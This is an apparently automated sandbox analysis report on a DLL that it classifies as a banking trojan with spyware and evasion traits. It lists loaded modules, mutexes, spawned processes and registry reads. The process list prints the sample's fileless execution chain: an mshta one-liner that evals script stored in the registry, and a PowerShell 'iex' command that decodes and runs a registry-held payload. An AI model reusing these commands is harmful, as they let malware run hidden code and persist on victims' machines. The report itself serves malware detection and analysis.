Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: | .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll			Jump to behavior

Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)

Source: 57BC.bin.33.dr

Binary string: Boot Device: \Device\HarddiskVolume2

Classification label

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@50/165@15/5

Contains functionality to enum processes or threads

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00DAA648 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

1_2_00DAA648

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{A859AC28-E770-1AB9-B15C-0BEE75506F02}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D4F2B30B-23C0-26A7-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{5C4F96EB-0BA3-EE9C-7550-6F0279841356}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2420:120:WilError_01

Creates temporary files

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF8E1DD22F9E3B02A8.TMP

Jump to behavior

PE file has an executable .text section and no other executable section

Source: 5fbce6bbc8cc4png.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Reads ini files

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Runs a DLL by calling functions

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Sample is known by Antivirus

Source: 5fbce6bbc8cc4png.dll	Virustotal: Detection: 17%
Source: 5fbce6bbc8cc4png.dll	ReversingLabs: Detection: 14%

Spawns processes

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5fbce6bbc8cc4png.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fbce6bbc8cc4png.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:82964 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:82974 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:17434 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1rpmo52x\1rpmo52x.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4C68.tmp' 'c:\Users\user\AppData\Local\Temp\1rpmo52x\CSCD915EAFD191245B3934D90CF529F8C8.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5C37.tmp' 'c:\Users\user\AppData\Local\Temp\ncwpagzn\CSC5C637C2C8A1A47B595CDB8114288746.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fbce6bbc8cc4png.dll			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:17410 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:82952 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:82964 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:82974 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5408 CREDAT:17434 /prefetch:2			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1rpmo52x\1rpmo52x.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4C68.tmp' 'c:\Users\user\AppData\Local\Temp\1rpmo52x\CSCD915EAFD191245B3934D90CF529F8C8.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5C37.tmp' 'c:\Users\user\AppData\Local\Temp\ncwpagzn\CSC5C637C2C8A1A47B595CDB8114288746.TMP'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Uses an in-process (OLE) Automation server

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Uses Rich Edit Controls

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Checks if Microsoft Office is installed

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Binary contains paths to debug symbols

